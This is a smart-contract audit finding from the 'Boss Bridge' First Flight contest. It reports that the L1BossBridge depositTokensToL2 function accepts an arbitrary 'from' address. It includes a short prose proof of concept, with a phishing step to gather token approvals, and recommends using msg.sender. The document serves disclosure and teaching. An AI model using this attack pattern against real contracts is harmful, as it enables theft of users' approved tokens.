First Flight #4: Boss Bridge

Summary

The L1BossBridge contract's depositTokensToL2 function utilizes an arbitrary from parameter to transfer tokens from one account to another. This design permits a scenario where tokens can potentially be transferred without the explicit permission of the token owner, posing a substantial risk of unauthorized token movements.

Vulnerability Details

In the L1BossBridge contract, the depositTokensToL2 function is designed to transfer tokens from a specified from address to the contract’s vault. However, the function does not validate whether the caller has the authority to initiate a transfer from the from address. This lack of validation could enable a malicious actor to transfer tokens from any account that has approved the contract to spend its tokens, leading to unauthorized and potentially fraudulent token movements.

Impact

This vulnerability can lead to unauthorized token transfers, posing financial risks to users who have approved the contract to spend their tokens. The severity of the impact depends on the amount of tokens users have approved the contract to transfer and the number of users who have done so.

POC

1. Preparation: A malicious actor creates a phishing website or application mimicking a legitimate service. This phishing platform includes an interface that prompts users to approve the L1BossBridge contract to spend tokens on their behalf.

2. User A approves L1BossBridge to spend tokens on their behalf.

3. Malicious actor (or unaware user B) calls depositTokensToL2 with User A's address as the from parameter.

4. Tokens are transferred from User A’s account to the contract's vault without User A's explicit consent for this specific transaction.

Tools Used

• Foundry

• Slither

Recommendations

Restrict the depositTokensToL2 function to only allow the msg.sender to deposit their own tokens. This can be achieved by replacing the arbitrary from parameter with msg.sender, ensuring that users can only deposit tokens they own and control.